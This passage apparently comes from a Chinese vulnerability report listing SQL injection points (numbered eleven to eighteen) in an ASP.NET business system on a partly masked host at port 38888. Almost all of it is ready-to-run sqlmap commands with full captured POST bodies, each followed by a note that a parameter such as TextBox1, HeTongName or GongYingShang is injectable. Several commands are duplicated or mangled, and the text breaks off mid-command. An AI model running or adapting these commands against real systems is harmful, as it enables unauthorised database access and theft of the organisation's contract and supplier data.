sqlmap.py -u "**.**.**.**:38888/Project/LiRuiGuanLi.aspx?ProjectName=" --dbms="mssql" --batch --dbs --data "__VIEWSTATE=%2FwEPDwULLTExOTM1Mjc1NzYPZBYCZg9kFgYCDA88KwANAQAPFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnRmZGQCFg8PFgIeBFRleHQFATFkZAIYDw8WAh8CBQEwZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgoFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkJjBlmE6L8Xs%2FINq88smT0psJeSk%3D&TextBox1=abc&ImageButton4.x=30&ImageButton4.y=7&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgKjlre5BALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cbx%2BgsItWEB2Ut1NImQ7DCLeN0xP" -p TextBox1

TextBox1存在POST注入

注入十一、

sqlmap.py -u "**.**.**.**:38888/Project/ProjectJinDu.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKMTM5MzE2MTU5Mg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RMkeNiL4fyySar6FjKQtmkxWtf8A%3D%3D&TextBox1=11&ImageButton4.x=25&ImageButton4.y=9&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLU8sK%2FBALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cd%2BcuY%2BBUJ%2B0TUV9VWVKrnpFqh8Y" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Project/ProjectJinDu.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKMTM5MzE2MTU5Mg9kFgJmD2QWBgIMDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudGZkZAIWDw8WAh4EVGV4dAUBMWRkAhgPDxYCHwIFATBkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WCgUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2RMkeNiL4fyySar6FjKQtmkxWtf8A%3D%3D&TextBox1=11&ImageButton4.x=25&ImageButton4.y=9&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDgLU8sK%2FBALs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3Cd%2BcuY%2BBUJ%2B0TUV9VWVKrnpFqh8Y" -p TextBox1

TextBox1存在POST注入

注入十二、

sqlmap.py -u "**.**.**.**:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql"<br>
HeTongName存在注入

1 2	sqlmap.py -u "...:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql"<br> HeTongName存在注入

注入十三、

sqlmap.py -u "**.**.**.**:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFHUNvbnRyYWN0Q2hhblBpblZpZXcuYXNweD9JRD0yZBYCZg8VAQvoh6rooYzou4piMWQCAg8PFgIfBQUY5buj5bee6LuK6KGMMSAyMDEzLjExLjE0ZGQCAw8PFgIfBQUGNDAwLjAwZGQCBA8PFgIfBQUENS4wMGRkAgUPDxYCHwUFBzIwMDAuMDBkZAIGDw8WAh8FBQcxNTAwLjAwZGQCBw8PFgIfBQUGNTAwLjAwZGQCCA8PFgIfBQUJ5bey5Lqk5LuYZGQCAg8PZBYEHwMFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhJmD2QWAgIBDw8WAh8FBQExZGQCAQ9kFgICAQ8PFgIfBgUdQ29udHJhY3RDaGFuUGluVmlldy5hc3B4P0lEPTFkFgJmDxUBATFkAgIPDxYCHwUFBumHh%2Bi0rWRkAgMPDxYCHwUFBTE1LjAwZGQCBA8PFgIfBQUGNTAwLjAwZGQCBQ8PFgIfBQUHNzUwMC4wMGRkAgYPDxYCHwUFBzc1MDAuMDBkZAIHDw8WAh8FBQQwLjAwZGQCCA8PFgIfBQUJ5bey5Lqk5LuYZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkYy%2F1cZAgrUo079zthVbF%2FJlIshA%3D&TextBox1=1&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEALiitv6CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbFmNj2RdRLlmhie89lDYFzXBRwA" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Sell/SellLog.aspx?HeTongName=" --dbms="mssql" --batch --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAmQWAmYPZBYGAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATJkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFHUNvbnRyYWN0Q2hhblBpblZpZXcuYXNweD9JRD0yZBYCZg8VAQvoh6rooYzou4piMWQCAg8PFgIfBQUY5buj5bee6LuK6KGMMSAyMDEzLjExLjE0ZGQCAw8PFgIfBQUGNDAwLjAwZGQCBA8PFgIfBQUENS4wMGRkAgUPDxYCHwUFBzIwMDAuMDBkZAIGDw8WAh8FBQcxNTAwLjAwZGQCBw8PFgIfBQUGNTAwLjAwZGQCCA8PFgIfBQUJ5bey5Lqk5LuYZGQCAg8PZBYEHwMFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHwQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhJmD2QWAgIBDw8WAh8FBQExZGQCAQ9kFgICAQ8PFgIfBgUdQ29udHJhY3RDaGFuUGluVmlldy5hc3B4P0lEPTFkFgJmDxUBATFkAgIPDxYCHwUFBumHh%2Bi0rWRkAgMPDxYCHwUFBTE1LjAwZGQCBA8PFgIfBQUGNTAwLjAwZGQCBQ8PFgIfBQUHNzUwMC4wMGRkAgYPDxYCHwUFBzc1MDAuMDBkZAIHDw8WAh8FBQQwLjAwZGQCCA8PFgIfBQUJ5bey5Lqk5LuYZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkYy%2F1cZAgrUo079zthVbF%2FJlIshA%3D&TextBox1=1&ImageButton4.x=26&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEALiitv6CgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CbFmNj2RdRLlmhie89lDYFzXBRwA" -p TextBox1

TextBox1存在POST注入

注入十四、

sqlmap.py -u "**.**.**.**:38888/Supply/SupplysLink.aspx?GongYingShang=" --dbms="mssql"<br>
GongYingShang存在注入

1 2	sqlmap.py -u "...:38888/Supply/SupplysLink.aspx?GongYingShang=" --dbms="mssql"<br> GongYingShang存在注入

注入十五、

sqlmap.py -u "**.**.**.**:38888/Supply/SupplysLink.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGFN1cHBseUxpbmtWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQZkc2Zkc2ZkZAIDDw8WAh8FBQNzZGZkZAIEDw8WAh8FBQPnlLdkZAIFDw8WAh8FBQnmlq%2FokoLoiqxkZAIGDw8WAh8FBQY2NDY0NTZkZAIHDw8WAh8FBQM0NTZkZAIIDw8WAh8FBQM0NTZkZAICDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkI6DHR6wwLdTi6NFydX%2Bn%2F1dxUDc%3D&TextBox1=ASD&ImageButton4.x=36&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwLdsLmiDQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CUix3ea0%2FVLYbWVfqNDYfRbSQYqU" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Supply/SupplysLink.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUKLTI1MTAzMzQzMg9kFgJmD2QWBgIMDzwrAA0BAA8WBh4LXyFEYXRhQm91bmRnHglQYWdlQ291bnQCAR4LXyFJdGVtQ291bnQCAWQWAmYPZBYEAgEPD2QWBB4Lb25tb3VzZW92ZXIFQWM9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNFNEY0RkYnHgpvbm1vdXNlb3V0BR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYSZg9kFgICAQ8PFgIeBFRleHQFATFkZAIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFGFN1cHBseUxpbmtWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEDc2RmZAICDw8WAh8FBQZkc2Zkc2ZkZAIDDw8WAh8FBQNzZGZkZAIEDw8WAh8FBQPnlLdkZAIFDw8WAh8FBQnmlq%2FokoLoiqxkZAIGDw8WAh8FBQY2NDY0NTZkZAIHDw8WAh8FBQM0NTZkZAIIDw8WAh8FBQM0NTZkZAICDw8WAh4HVmlzaWJsZWhkZAIWDw8WAh8FBQExZGQCGA8PFgIfBQUBMWRkGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYLBQxJbWFnZUJ1dHRvbjQFDEltYWdlQnV0dG9uMQUMSW1hZ2VCdXR0b241BQxJbWFnZUJ1dHRvbjMFDEltYWdlQnV0dG9uMgUYR1ZEYXRhJGN0bDAyJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dkI6DHR6wwLdTi6NFydX%2Bn%2F1dxUDc%3D&TextBox1=ASD&ImageButton4.x=36&ImageButton4.y=4&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwLdsLmiDQLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CUix3ea0%2FVLYbWVfqNDYfRbSQYqU" -p TextBox1

TextBox1存在POST注入

注入十六、

sqlmap.py -u "**.**.**.**:38888/Supply/BuyOrder.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMWRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQnV5T3JkZXJWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEGZGZkZmRmZAICDw8WAh8FBQVzZGZzZmRkAgMPDxYCHwUFA3NkZmRkAgQPDxYCHwUFDOW5v%2BW3nuiHtOS%2FoWRkAgUPDxYCHwUFBWFkbWluZGQCBg8PFgIfBQUQMjAxMC0xLTEgMDowMDowMGRkAgcPDxYCHwUFDOetieW%2BheWuoeaguGRkAgIPDxYCHgdWaXNpYmxlaGRkAhYPDxYCHwUFATFkZAIYDw8WAh8FBQExZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgsFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBRhHVkRhdGEkY3RsMDIkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TXut0IcMwlZoFtT3iDkc6VPhYrTA%3D%3D&TextBox1=df&ImageButton4.x=22&ImageButton4.y=6&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwKVhsOBCgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CZ%2F3Zt3e%2FITPYlHuDKMUU4kWebgQ" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Supply/BuyOrder.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAIBZBYCZg9kFgQCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMWRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQnV5T3JkZXJWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEGZGZkZmRmZAICDw8WAh8FBQVzZGZzZmRkAgMPDxYCHwUFA3NkZmRkAgQPDxYCHwUFDOW5v%2BW3nuiHtOS%2FoWRkAgUPDxYCHwUFBWFkbWluZGQCBg8PFgIfBQUQMjAxMC0xLTEgMDowMDowMGRkAgcPDxYCHwUFDOetieW%2BheWuoeaguGRkAgIPDxYCHgdWaXNpYmxlaGRkAhYPDxYCHwUFATFkZAIYDw8WAh8FBQExZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgsFDEltYWdlQnV0dG9uNAUMSW1hZ2VCdXR0b24xBQxJbWFnZUJ1dHRvbjUFDEltYWdlQnV0dG9uMwUMSW1hZ2VCdXR0b24yBRhHVkRhdGEkY3RsMDIkQ2hlY2tTZWxlY3QFCEJ0bkZpcnN0BQZCdG5QcmUFB0J0bk5leHQFB0J0bkxhc3QFCEJ1dHRvbkdvBQZHVkRhdGEPZ2TXut0IcMwlZoFtT3iDkc6VPhYrTA%3D%3D&TextBox1=df&ImageButton4.x=22&ImageButton4.y=6&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWDwKVhsOBCgLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CALu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CZ%2F3Zt3e%2FITPYlHuDKMUU4kWebgQ" -p TextBox1

TextBox1存在POST注入

注入十七、

sqlmap.py -u "**.**.**.**:38888/Supply/Supplys.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUVU3VwcGx5c1ZpZXcuYXNweD9JRD0yZBYCZg8VAQZzZGZzZGZkAgIPDxYCHwUFBXNkZnNmZGQCAw8PFgIfBQUFc2Rmc2ZkZAIEDw8WAh8FBQQ0NTY1ZGQCBQ8PFgIfBQUENDU2NGRkAgYPDxYCHwUFAzU0NmRkAgcPDxYCHwUFAzQ1NmRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYQZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFFVN1cHBseXNWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEM5bm%2F5bee6Ie05L%2BhZAICDw8WAh8FBQcwMjAwMDAxZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBQ8PFgIfBQUGJm5ic3A7ZGQCBg8PFgIfBQUGJm5ic3A7ZGQCBw8PFgIfBQUGJm5ic3A7ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dksAiQ8uwZGJQ3OSNmVyIgDb8hyU0%3D&TextBox1=sdf&ImageButton4.x=23&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHp4CLAwLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CVC9mLjd61k9IXwsoe8r75K0c3hm" -p TextBox1<br>
TextBox1存在POST注入

sqlmap.py -u "**.**.**.**:38888/Supply/Supplys.aspx" --dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUVU3VwcGx5c1ZpZXcuYXNweD9JRD0yZBYCZg8VAQZzZGZzZGZkAgIPDxYCHwUFBXNkZnNmZGQCAw8PFgIfBQUFc2Rmc2ZkZAIEDw8WAh8FBQQ0NTY1ZGQCBQ8PFgIfBQUENDU2NGRkAgYPDxYCHwUFAzU0NmRkAgcPDxYCHwUFAzQ1NmRkAgIPD2QWBB8DBUFjPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjRTRGNEZGJx8EBR10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jOxYQZg9kFgICAQ8PFgIfBQUBMWRkAgEPZBYCAgEPDxYCHwYFFVN1cHBseXNWaWV3LmFzcHg%2FSUQ9MWQWAmYPFQEM5bm%2F5bee6Ie05L%2BhZAICDw8WAh8FBQcwMjAwMDAxZGQCAw8PFgIfBQUGJm5ic3A7ZGQCBA8PFgIfBQUGJm5ic3A7ZGQCBQ8PFgIfBQUGJm5ic3A7ZGQCBg8PFgIfBQUGJm5ic3A7ZGQCBw8PFgIfBQUGJm5ic3A7ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZWNrU2VsZWN0BQhCdG5GaXJzdAUGQnRuUHJlBQdCdG5OZXh0BQdCdG5MYXN0BQhCdXR0b25HbwUGR1ZEYXRhD2dksAiQ8uwZGJQ3OSNmVyIgDb8hyU0%3D&TextBox1=sdf&ImageButton4.x=23&ImageButton4.y=5&TxtPageSize=15&GoPage=1&__EVENTVALIDATION=%2FwEWEAKHp4CLAwLs0bLrBgLSwv2aBALSwpnTCALSwum%2FCwLSwsGJCgLSwtXkAgKjzK72CAKjzNLWAgLu%2F93hDwLWmtnlAwKV6fOOCgKR6bePCQK67b6uAgKkstWWBQL6jqL3CVC9mLjd61k9IXwsoe8r75K0c3hm" -p TextBox1

TextBox1存在POST注入

注入十八、

sqlmap.py -u "**.**.**.**:38888/Sell/Contract.aspx"--dbms="mssql" --data "__VIEWSTATE=%2FwEPDwUJNjA5NDQ1Nzg5D2QWAmYPZBYGAgwPPCsADQEADxYGHgtfIURhdGFCb3VuZGceCVBhZ2VDb3VudAIBHgtfIUl0ZW1Db3VudAICZBYCZg9kFgYCAQ8PZBYEHgtvbm1vdXNlb3ZlcgVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRiceCm9ubW91c2VvdXQFHXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWM7FhBmD2QWAgIBDw8WAh4EVGV4dAUBMmRkAgEPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAUWQ29udHJhY3RWaWV3LmFzcHg%2FSUQ9MmQWAmYPFQEY5buj5bee6LuK6KGMMSAyMDEzLjExLjE0ZAICDw8WAh8FBQcyMDEzMDAxZGQCAw8PFgIfBQUG6Yq35ZSuZGQCBA8PFgIfBQUH6LuK6KGMMWRkAgUPDxYCHwUFA2FhYWRkAgYPDxYCHwUFEzIwMTMtMTEtMTQgMTU6MjU6MTlkZAIHDw8WAh8FBQzpgJrov4flrqHmoLhkZAICDw9kFgQfAwVBYz10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0U0RjRGRicfBAUddGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9YzsWEGYPZBYCAgEPDxYCHwUFATFkZAIBD2QWAgIBDw8WAh8GBRZDb250cmFjdFZpZXcuYXNweD9JRD0xZBYCZg8VAQbph4fotK1kAgIPDxYCHwUFBzIwMTIwMDFkZAIDDw8WAh8FBQbph4fotK1kZAIEDw8WAh8FBRLljJfkuqzkuK3llYbljLvoja9kZAIFDw8WAh8FBQNhYWFkZAIGDw8WAh8FBRMyMDEyLTEwLTI1IDE0OjUyOjEzZGQCBw8PFgIfBQUM6YCa6L%2BH5a6h5qC4ZGQCAw8PFgIeB1Zpc2libGVoZGQCFg8PFgIfBQUBMWRkAhgPDxYCHwUFATFkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WDAUMSW1hZ2VCdXR0b240BQxJbWFnZUJ1dHRvbjEFDEltYWdlQnV0dG9uNQUMSW1hZ2VCdXR0b24zBQxJbWFnZUJ1dHRvbjIFGEdWRGF0YSRjdGwwMiRDaGVja1NlbGVjdAUYR1ZEYXRhJGN0bDAzJENoZW